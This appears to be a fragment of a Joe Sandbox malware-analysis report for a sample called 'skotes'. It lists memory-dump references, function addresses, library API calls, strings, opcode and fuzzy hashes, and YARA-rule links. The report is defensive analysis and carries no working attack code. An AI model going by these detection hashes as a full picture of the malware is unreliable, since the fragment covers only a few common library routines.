Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
Instruction ID: 2fe954d65b4b50834951edb994104e0446c73801206968c056bf44c713a15be5
Opcode Fuzzy Hash: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
Instruction Fuzzy Hash: 8D01086760861635663520199E0276713888BCABB8F25202FFDA4F73C1EF8CDD42A1EC

Function 0041FA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FB06

Strings

kernel32.dll, xrefs: 0041FA7A
SetThreadGroupAffinity, xrefs: 0041FA87
GetThreadGroupAffinity, xrefs: 0041FA93
GetCurrentProcessorNumberEx, xrefs: 0041FABE

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
API String ID: 348560076-465693683
Opcode ID: 9d0336926df03994bcaf6fa82b0a3a7bc9e79d300cb05644f30273212bb028c0
Instruction ID: 393135117250bf6284ec6314819fdb495f8aff0909566c557be5ff88c95e2efa
Opcode Fuzzy Hash: 9d0336926df03994bcaf6fa82b0a3a7bc9e79d300cb05644f30273212bb028c0
Instruction Fuzzy Hash: C901F9326453252DA610B7B76C42BFF26DC8D0564CB70043BF800E3253EEACE80951AD

Function 00432097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 004320B7

Part of subcall function 0042CAF3: Mailbox.LIBCMT ref: 0042CB2D

Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004320C8
StructuredWorkStealingQueue.LIBCMT ref: 004320FE
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043210F

Strings

e, xrefs: 004320D9

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
String ID: e
API String ID: 1411586358-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 1ff5ec0336f97ae43b1f0b8f375a3bc5f2b05840f56227257267f5d03aa7fa4d
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: 9411C131200104ABDF45DE69CB8166B73A4AF0A328F14D05BFD068F242DBF9D905CB99

Function 0041D029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

___scrt_fastfail.LIBCMT ref: 0041D0A5

Strings

WakeAllConditionVariable, xrefs: 0041D069
kernel32.dll, xrefs: 0041D04C
api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D03B
SleepConditionVariableCS, xrefs: 0041D05D

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ___scrt_fastfail
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2964418898-3242537097
Opcode ID: 57592d471614fb3a2a0a6bb93bce930c82ffe64d1e0ef8977a4601e464b281ca
Instruction ID: 8387e4ea946d9b400682532de80475b4adefb82f9af4ee9e0bb76fb3b404875e
Opcode Fuzzy Hash: 57592d471614fb3a2a0a6bb93bce930c82ffe64d1e0ef8977a4601e464b281ca
Instruction Fuzzy Hash: 6E016CB1FC27117AAA3136766C01F9B1589CB46B4DF151123EC04E3690EAA8DC81557E

Function 0042E8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 0042E91E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E926
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E950
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E959
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E9DC

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
String ID:
API String ID: 512098550-0
Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction ID: e456b2d5945dcb9d16af89579036fa7bc11e47face3e2a4e749ba7397f49833a
Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
Instruction Fuzzy Hash: A7418079B00219EFCB09DF65D454A6DB7B1FF48310F00816AE806A7391CB38AE41CF85

Function 0041ECE6 Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

